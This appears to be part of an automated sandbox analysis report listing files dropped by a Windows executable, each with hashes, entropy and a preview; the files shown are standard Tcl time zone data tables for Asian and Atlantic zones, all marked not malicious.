                                                                                                                                                                                                                                                    Size (bytes):6672
                                                                                                                                                                                                                                                    Entropy (8bit):3.8288376975522156
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:gJhQIT2Urw7Xj8ieOB42VXnGB3wkBIGAr:gzQIRv4oCr
                                                                                                                                                                                                                                                    MD5:6AB7A3966A6507B12AC163A811838E1D
                                                                                                                                                                                                                                                    SHA1:659BFE5F340CBF69CBA4CF5EA71C0BFFC8921C49
                                                                                                                                                                                                                                                    SHA-256:CB5C7AAEA7192C546E834A87DF290A851598F9A356BF41C25071A421575F7E44
                                                                                                                                                                                                                                                    SHA-512:98AF7116F1DD16F0F82F6AE490D6046E35EE09647660EE022C8F0B0991F96BB53E0A090A56FEC2728C5BA57283FE5A6BAFF164D4046857FF0D52A797D516FB9E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ulaanbaatar) {. {-9223372036854775808 25652 0 LMT}. {-2032931252 25200 0 ULAT}. {252435600 28800 0 ULAT}. {417974400 32400 1 ULAST}. {433782000 28800 0 ULAT}. {449596800 32400 1 ULAST}. {465318000 28800 0 ULAT}. {481046400 32400 1 ULAST}. {496767600 28800 0 ULAT}. {512496000 32400 1 ULAST}. {528217200 28800 0 ULAT}. {543945600 32400 1 ULAST}. {559666800 28800 0 ULAT}. {575395200 32400 1 ULAST}. {591116400 28800 0 ULAT}. {606844800 32400 1 ULAST}. {622566000 28800 0 ULAT}. {638294400 32400 1 ULAST}. {654620400 28800 0 ULAT}. {670348800 32400 1 ULAST}. {686070000 28800 0 ULAT}. {701798400 32400 1 ULAST}. {717519600 28800 0 ULAT}. {733248000 32400 1 ULAST}. {748969200 28800 0 ULAT}. {764697600 32400 1 ULAST}. {780418800 28800 0 ULAT}. {796147200 32400 1 ULAST}. {811868400 28800 0 ULAT}. {828201600 32400 1 ULAST}. {843922800 28800 0 ULAT
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):187
                                                                                                                                                                                                                                                    Entropy (8bit):4.675919405724711
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8TcXHVAIgNrfcXKxL2WFKhrMEBQWFKucXu:SlSWB9IZaM3yIVAIg7xL2wKhrMEewKI
                                                                                                                                                                                                                                                    MD5:73C6A7BC088A3CD92CAC2F8B019994A0
                                                                                                                                                                                                                                                    SHA1:74D5DCE1100F6C97DFCFAD5EFC310196F03ABED5
                                                                                                                                                                                                                                                    SHA-256:8F075ACF5FF86E5CDE63E178F7FCB692C209B6023C80157A2ABF6826AE63C6C3
                                                                                                                                                                                                                                                    SHA-512:4EAD916D2251CF3A9B336448B467282C251EE5D98299334F365711CCA8CAF9CA83600503A3346AEC9DFA9E9AF064BA6DEF570BABCC48AE5EB954DBF574A769B2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Ulaanbaatar)]} {. LoadTimeZoneFile Asia/Ulaanbaatar.}.set TZData(:Asia/Ulan_Bator) $TZData(:Asia/Ulaanbaatar).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):143
                                                                                                                                                                                                                                                    Entropy (8bit):4.995506280770131
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52WFKjmcXGm2OHEVPvUWA0GVF7L:SlSWB9X52wKjmTm2OHEVPXA0Cd
                                                                                                                                                                                                                                                    MD5:C0FDB7B9DF67B31B7087C3EB80C2E473
                                                                                                                                                                                                                                                    SHA1:8A4108D3AB25EAC551242DD6026B78A92EEA7535
                                                                                                                                                                                                                                                    SHA-256:E65943AA8AC4ED8336E534D3BA90835DA6BD62397D5EACA114E72EA0C4DBE111
                                                                                                                                                                                                                                                    SHA-512:F73CB1970DC6DB37D4DF8E10D7CBDA4923D141AAB6C83663D6ED32063782A966BBABD3CF06DF1D2DAAFA81F80FE5BFBBC724BC30B2E1295783999A842C7D64E9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Urumqi) {. {-9223372036854775808 21020 0 LMT}. {-1325483420 21600 0 XJT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2089
                                                                                                                                                                                                                                                    Entropy (8bit):3.984114579228438
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQueIlfuvhOCTi7ZXltAtwGpd296ymXPO9UHxQdCHt/CXHmW9YbcINu2M:5YWvhBiR8ld296yKPO9UHj1UGWgc4ur
                                                                                                                                                                                                                                                    MD5:F95425C274DDD87B976F39958DF0539A
                                                                                                                                                                                                                                                    SHA1:0BD62F03458AAC6B2866C8F6A7337D43F9525AAD
                                                                                                                                                                                                                                                    SHA-256:2DACCF1F3016CFE47DBCAC51782421A902A3FFB222763D1ECC2DD6D768E9804F
                                                                                                                                                                                                                                                    SHA-512:EAB691820324B08E56C605FCF71D73FBFCF22F74FD1D3018154ACA201BC0217669925BB7BD33DE5DE0B149B42795D9B06E7CD3EFEF3F7DA396189569467159BA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ust-Nera) {. {-9223372036854775808 34374 0 LMT}. {-1579426374 28800 0 YAKT}. {354898800 43200 0 MAGST}. {370699200 39600 0 MAGT}. {386427600 43200 1 MAGST}. {402235200 39600 0 MAGT}. {417963600 43200 1 MAGST}. {433771200 39600 0 MAGT}. {449586000 43200 1 MAGST}. {465318000 39600 0 MAGT}. {481042800 43200 1 MAGST}. {496767600 39600 0 MAGT}. {512492400 43200 1 MAGST}. {528217200 39600 0 MAGT}. {543942000 43200 1 MAGST}. {559666800 39600 0 MAGT}. {575391600 43200 1 MAGST}. {591116400 39600 0 MAGT}. {606841200 43200 1 MAGST}. {622566000 39600 0 MAGT}. {638290800 43200 1 MAGST}. {654620400 39600 0 MAGT}. {670345200 36000 0 MAGMMTT}. {670348800 39600 1 MAGST}. {686073600 36000 0 MAGT}. {695750400 39600 0 MAGMMTT}. {701784000 43200 1 MAGST}. {717505200 39600 0 MAGT}. {733244400 43200 1 MAGST}. {748969200 39600 0 MAGT}. {764694000 43200 1 MA
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):174
                                                                                                                                                                                                                                                    Entropy (8bit):4.808435832735883
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8VLYO5YFwVAIgN8ELYOAvN2WFKgTjEHp4WFKELYOun:SlSWB9IZaM3y1LewVAIgKELUvN2wKgsI
                                                                                                                                                                                                                                                    MD5:6372DA942647071A0514AEBF0AFEB7C7
                                                                                                                                                                                                                                                    SHA1:C9FB6B05DA246224D5EB016035AB905657B9D3FA
                                                                                                                                                                                                                                                    SHA-256:7B1A3F36E9A12B850DC06595AAE6294FAEAC98AD933B3327B866E83C0E9A1999
                                                                                                                                                                                                                                                    SHA-512:DC7D8753AD0D6908CA8765623EC1C4E4717833D183435957BB43E7ADB8A0D078F87319408F4C1D284CFB24BE010141B3254A36EF50C5DDCC59D7DEE5B3E33B7F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Bangkok)]} {. LoadTimeZoneFile Asia/Bangkok.}.set TZData(:Asia/Vientiane) $TZData(:Asia/Bangkok).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2096
                                                                                                                                                                                                                                                    Entropy (8bit):3.9430413610833295
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:561B/9YnvKCEzQX8NcD8AxJvC7ruR/qRapveJj2iBjGEL4mGubhEZIIAsL:U1dunvTEz1NcD8AxJvC7ruR/qRapWJjS
                                                                                                                                                                                                                                                    MD5:4D9E105B729BF73845C92C47A2AA63E0
                                                                                                                                                                                                                                                    SHA1:BEB0BA6146FCB1CE2359053CE44BA42C317D2B23
                                                                                                                                                                                                                                                    SHA-256:384BB739D140FABB38D844ABD1273CF9926FAFD8A04F6CB941CA33EF68EB81D0
                                                                                                                                                                                                                                                    SHA-512:20D022C2BC7B983BF22C80DA79BBC7164400C5C6BBC6E2F67A2ED01BC24ADD2455289C321EC30B4A4D377A3D420E4614B9E564704AA69D9B9BA64B4400383BE8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Vladivostok) {. {-9223372036854775808 31651 0 LMT}. {-1487321251 32400 0 VLAT}. {-1247562000 36000 0 VLAMMTT}. {354895200 39600 1 VLAST}. {370702800 36000 0 VLAT}. {386431200 39600 1 VLAST}. {402238800 36000 0 VLAT}. {417967200 39600 1 VLAST}. {433774800 36000 0 VLAT}. {449589600 39600 1 VLAST}. {465321600 36000 0 VLAT}. {481046400 39600 1 VLAST}. {496771200 36000 0 VLAT}. {512496000 39600 1 VLAST}. {528220800 36000 0 VLAT}. {543945600 39600 1 VLAST}. {559670400 36000 0 VLAT}. {575395200 39600 1 VLAST}. {591120000 36000 0 VLAT}. {606844800 39600 1 VLAST}. {622569600 36000 0 VLAT}. {638294400 39600 1 VLAST}. {654624000 36000 0 VLAT}. {670348800 32400 0 VLAMMTT}. {670352400 36000 1 VLAST}. {686077200 32400 0 VLAT}. {695754000 36000 0 VLAMMTT}. {701787600 39600 1 VLAST}. {717508800 36000 0 VLAT}. {733248000 39600 1 VLAST}. {748972800 36
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2092
                                                                                                                                                                                                                                                    Entropy (8bit):3.9469034609045983
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQVe7Ox4Ee6QzVLNoIKtyDYzj7QBLxUDZEAznMkoNiLWk7F0i2zdNIzQu3T0JchL:5Q/ZaPG2RxLk3Isfr7jrhDbA
                                                                                                                                                                                                                                                    MD5:4E045EF998B060BAAD6E6B522D7DF3F7
                                                                                                                                                                                                                                                    SHA1:AF139E64B4189E5AAE3086E7FFC554C19E2B79E7
                                                                                                                                                                                                                                                    SHA-256:FFE2B53F5B56F7BA20FFF22FAAE033A5F17F775D5598AA318468D9B0BC95DC72
                                                                                                                                                                                                                                                    SHA-512:5E05721F30FC186450492D8FA1007F9E950C0F0E94D99CDFFCD5379CF8DC47537A18EC61312F61164B1015C99E47509A1C9A57E93814357BD4A4538CD2210552
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Yakutsk) {. {-9223372036854775808 31138 0 LMT}. {-1579423138 28800 0 YAKT}. {-1247558400 32400 0 YAKMMTT}. {354898800 36000 1 YAKST}. {370706400 32400 0 YAKT}. {386434800 36000 1 YAKST}. {402242400 32400 0 YAKT}. {417970800 36000 1 YAKST}. {433778400 32400 0 YAKT}. {449593200 36000 1 YAKST}. {465325200 32400 0 YAKT}. {481050000 36000 1 YAKST}. {496774800 32400 0 YAKT}. {512499600 36000 1 YAKST}. {528224400 32400 0 YAKT}. {543949200 36000 1 YAKST}. {559674000 32400 0 YAKT}. {575398800 36000 1 YAKST}. {591123600 32400 0 YAKT}. {606848400 36000 1 YAKST}. {622573200 32400 0 YAKT}. {638298000 36000 1 YAKST}. {654627600 32400 0 YAKT}. {670352400 28800 0 YAKMMTT}. {670356000 32400 1 YAKST}. {686080800 28800 0 YAKT}. {695757600 32400 0 YAKMMTT}. {701791200 36000 1 YAKST}. {717512400 32400 0 YAKT}. {733251600 36000 1 YAKST}. {748976400 32400
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2128
                                                                                                                                                                                                                                                    Entropy (8bit):3.973341452577109
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Yekaterinburg) {. {-9223372036854775808 14553 0 LMT}. {-1688270553 13505 0 PMT}. {-1592610305 14400 0 SVET}. {-1247544000 18000 0 SVEMMTT}. {354913200 21600 1 SVEST}. {370720800 18000 0 SVET}. {386449200 21600 1 SVEST}. {402256800 18000 0 SVET}. {417985200 21600 1 SVEST}. {433792800 18000 0 SVET}. {449607600 21600 1 SVEST}. {465339600 18000 0 SVET}. {481064400 21600 1 SVEST}. {496789200 18000 0 SVET}. {512514000 21600 1 SVEST}. {528238800 18000 0 SVET}. {543963600 21600 1 SVEST}. {559688400 18000 0 SVET}. {575413200 21600 1 SVEST}. {591138000 18000 0 SVET}. {606862800 21600 1 SVEST}. {622587600 18000 0 SVET}. {638312400 21600 1 SVEST}. {654642000 18000 0 SVET}. {670366800 14400 0 SVEMMTT}. {670370400 18000 1 SVEST}. {686095200 14400 0 SVET}. {695772000 18000 0 YEKMMTT}. {701805600 21600 1 YEKST}. {717526800 18000 0 YEKT}. {733266000
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2013
                                                                                                                                                                                                                                                    Entropy (8bit):3.917239737702558
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Yerevan) {. {-9223372036854775808 10680 0 LMT}. {-1441162680 10800 0 YERT}. {-405140400 14400 0 YERT}. {354916800 18000 1 YERST}. {370724400 14400 0 YERT}. {386452800 18000 1 YERST}. {402260400 14400 0 YERT}. {417988800 18000 1 YERST}. {433796400 14400 0 YERT}. {449611200 18000 1 YERST}. {465343200 14400 0 YERT}. {481068000 18000 1 YERST}. {496792800 14400 0 YERT}. {512517600 18000 1 YERST}. {528242400 14400 0 YERT}. {543967200 18000 1 YERST}. {559692000 14400 0 YERT}. {575416800 18000 1 YERST}. {591141600 14400 0 YERT}. {606866400 18000 1 YERST}. {622591200 14400 0 YERT}. {638316000 18000 1 YERST}. {654645600 14400 0 YERT}. {670370400 14400 1 YERST}. {685569600 14400 0 AMST}. {686098800 10800 0 AMT}. {701812800 14400 1 AMST}. {717534000 10800 0 AMT}. {733273200 14400 1 AMST}. {748998000 10800 0 AMT}. {764722800 14400 1 AMST}. {78
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10092
                                                                                                                                                                                                                                                    Entropy (8bit):3.8649528780118496
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Azores) {. {-9223372036854775808 -6160 0 LMT}. {-2713904240 -6872 0 HMT}. {-1830377128 -7200 0 AZOT}. {-1689548400 -3600 1 AZOST}. {-1677794400 -7200 0 AZOT}. {-1667430000 -3600 1 AZOST}. {-1647730800 -7200 0 AZOT}. {-1635807600 -3600 1 AZOST}. {-1616194800 -7200 0 AZOT}. {-1604358000 -3600 1 AZOST}. {-1584658800 -7200 0 AZOT}. {-1572735600 -3600 1 AZOST}. {-1553036400 -7200 0 AZOT}. {-1541199600 -3600 1 AZOST}. {-1521500400 -7200 0 AZOT}. {-1442444400 -3600 1 AZOST}. {-1426806000 -7200 0 AZOT}. {-1379286000 -3600 1 AZOST}. {-1364770800 -7200 0 AZOT}. {-1348441200 -3600 1 AZOST}. {-1333321200 -7200 0 AZOT}. {-1316386800 -3600 1 AZOST}. {-1301266800 -7200 0 AZOT}. {-1284332400 -3600 1 AZOST}. {-1269817200 -7200 0 AZOT}. {-1221433200 -3600 1 AZOST}. {-1206918000 -7200 0 AZOT}. {-1191193200 -3600 1 AZOST}. {-1175468400 -7200 0 AZOT}. {
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7684
                                                                                                                                                                                                                                                    Entropy (8bit):3.7376923223964162
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Bermuda) {. {-9223372036854775808 -15558 0 LMT}. {-1262281242 -14400 0 AST}. {136360800 -10800 0 ADT}. {152082000 -14400 0 AST}. {167810400 -10800 1 ADT}. {183531600 -14400 0 AST}. {189316800 -14400 0 AST}. {199260000 -10800 1 ADT}. {215586000 -14400 0 AST}. {230709600 -10800 1 ADT}. {247035600 -14400 0 AST}. {262764000 -10800 1 ADT}. {278485200 -14400 0 AST}. {294213600 -10800 1 ADT}. {309934800 -14400 0 AST}. {325663200 -10800 1 ADT}. {341384400 -14400 0 AST}. {357112800 -10800 1 ADT}. {372834000 -14400 0 AST}. {388562400 -10800 1 ADT}. {404888400 -14400 0 AST}. {420012000 -10800 1 ADT}. {436338000 -14400 0 AST}. {452066400 -10800 1 ADT}. {467787600 -14400 0 AST}. {483516000 -10800 1 ADT}. {499237200 -14400 0 AST}. {514965600 -10800 1 ADT}. {530686800 -14400 0 AST}. {544600800 -10800 1 ADT}. {562136400 -14400 0 AST}. {576050
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6610
                                                                                                                                                                                                                                                    Entropy (8bit):3.7198409643231902
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Canary) {. {-9223372036854775808 -3696 0 LMT}. {-1509663504 -3600 0 CANT}. {-733874400 0 0 WET}. {323827200 3600 1 WEST}. {338950800 0 0 WET}. {354675600 3600 1 WEST}. {370400400 0 0 WET}. {386125200 3600 1 WEST}. {401850000 0 0 WET}. {417574800 3600 1 WEST}. {433299600 0 0 WET}. {449024400 3600 1 WEST}. {465354000 0 0 WET}. {481078800 3600 1 WEST}. {496803600 0 0 WET}. {512528400 3600 1 WEST}. {528253200 0 0 WET}. {543978000 3600 1 WEST}. {559702800 0 0 WET}. {575427600 3600 1 WEST}. {591152400 0 0 WET}. {606877200 3600 1 WEST}. {622602000 0 0 WET}. {638326800 3600 1 WEST}. {654656400 0 0 WET}. {670381200 3600 1 WEST}. {686106000 0 0 WET}. {701830800 3600 1 WEST}. {717555600 0 0 WET}. {733280400 3600 1 WEST}. {749005200 0 0 WET}. {764730000 3600 1 WEST}. {780454800 0 0 WET}. {796179600 3600 1 WEST}. {811904400 0 0 WE
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):238
                                                                                                                                                                                                                                                    Entropy (8bit):4.738409097680679
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Cape_Verde) {. {-9223372036854775808 -5644 0 LMT}. {-1988144756 -7200 0 CVT}. {-862610400 -3600 1 CVST}. {-764118000 -7200 0 CVT}. {186120000 -3600 0 CVT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                                                    Entropy (8bit):4.655846706649014
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Atlantic/Faroe)]} {. LoadTimeZoneFile Atlantic/Faroe.}.set TZData(:Atlantic/Faeroe) $TZData(:Atlantic/Faroe).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6551
                                                                                                                                                                                                                                                    Entropy (8bit):3.7148806034051316
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Faroe) {. {-9223372036854775808 -1624 0 LMT}. {-1955748776 0 0 WET}. {347155200 0 0 WET}. {354675600 3600 1 WEST}. {370400400 0 0 WET}. {386125200 3600 1 WEST}. {401850000 0 0 WET}. {417574800 3600 1 WEST}. {433299600 0 0 WET}. {449024400 3600 1 WEST}. {465354000 0 0 WET}. {481078800 3600 1 WEST}. {496803600 0 0 WET}. {512528400 3600 1 WEST}. {528253200 0 0 WET}. {543978000 3600 1 WEST}. {559702800 0 0 WET}. {575427600 3600 1 WEST}. {591152400 0 0 WET}. {606877200 3600 1 WEST}. {622602000 0 0 WET}. {638326800 3600 1 WEST}. {654656400 0 0 WET}. {670381200 3600 1 WEST}. {686106000 0 0 WET}. {701830800 3600 1 WEST}. {717555600 0 0 WET}. {733280400 3600 1 WEST}. {749005200 0 0 WET}. {764730000 3600 1 WEST}. {780454800 0 0 WET}. {796179600 3600 1 WEST}. {811904400 0 0 WET}. {828234000 3600 1 WEST}. {846378000 0 0 WET}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):175
                                                                                                                                                                                                                                                    Entropy (8bit):4.92967249261586
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Oslo)]} {. LoadTimeZoneFile Europe/Oslo.}.set TZData(:Atlantic/Jan_Mayen) $TZData(:Europe/Oslo).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9568
                                                                                                                                                                                                                                                    Entropy (8bit):3.8487941547305065
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Madeira) {. {-9223372036854775808 -4056 0 LMT}. {-2713906344 -4056 0 FMT}. {-1830379944 -3600 0 MADT}. {-1689552000 0 1 MADST}. {-1677798000 -3600 0 MADT}. {-1667433600 0 1 MADST}. {-1647734400 -3600 0 MADT}. {-1635811200 0 1 MADST}. {-1616198400 -3600 0 MADT}. {-1604361600 0 1 MADST}. {-1584662400 -3600 0 MADT}. {-1572739200 0 1 MADST}. {-1553040000 -3600 0 MADT}. {-1541203200 0 1 MADST}. {-1521504000 -3600 0 MADT}. {-1442448000 0 1 MADST}. {-1426809600 -3600 0 MADT}. {-1379289600 0 1 MADST}. {-1364774400 -3600 0 MADT}. {-1348444800 0 1 MADST}. {-1333324800 -3600 0 MADT}. {-1316390400 0 1 MADST}. {-1301270400 -3600 0 MADT}. {-1284336000 0 1 MADST}. {-1269820800 -3600 0 MADT}. {-1221436800 0 1 MADST}. {-1206921600 -3600 0 MADT}. {-1191196800 0 1 MADST}. {-1175472000 -3600 0 MADT}. {-1127692800 0 1 MADST}. {-1111968000 -3600 0 MAD
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1995
                                                                                                                                                                                                                                                    Entropy (8bit):3.9109506980242084
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Reykjavik) {. {-9223372036854775808 -5280 0 LMT}. {-1956609120 -3600 0 IST}. {-1668211200 0 1 ISST}. {-1647212400 -3600 0 IST}. {-1636675200 0 1 ISST}. {-1613430000 -3600 0 IST}. {-1605139200 0 1 ISST}. {-1581894000 -3600 0 IST}. {-1539561600 0 1 ISST}. {-1531350000 -3600 0 IST}. {-968025600 0 1 ISST}. {-952293600 -3600 0 IST}. {-942008400 0 1 ISST}. {-920239200 -3600 0 IST}. {-909957600 0 1 ISST}. {-888789600 -3600 0 IST}. {-877903200 0 1 ISST}. {-857944800 -3600 0 IST}. {-846453600 0 1 ISST}. {-826495200 -3600 0 IST}. {-815004000 0 1 ISST}. {-795045600 -3600 0 IST}. {-783554400 0 1 ISST}. {-762991200 -3600 0 IST}. {-752104800 0 1 ISST}. {-731541600 -3600 0 IST}. {-717631200 0 1 ISST}. {-700092000 -3600 0 IST}. {-686181600 0 1 ISST}. {-668642400 -3600 0 IST}. {-654732000 0 1 ISST}. {-636588000 -3600 0 IST}. {-623282400 0 1
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):154
                                                                                                                                                                                                                                                    Entropy (8bit):5.004788019784553
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/South_Georgia) {. {-9223372036854775808 -8768 0 LMT}. {-2524512832 -7200 0 GST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.831929124818878
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
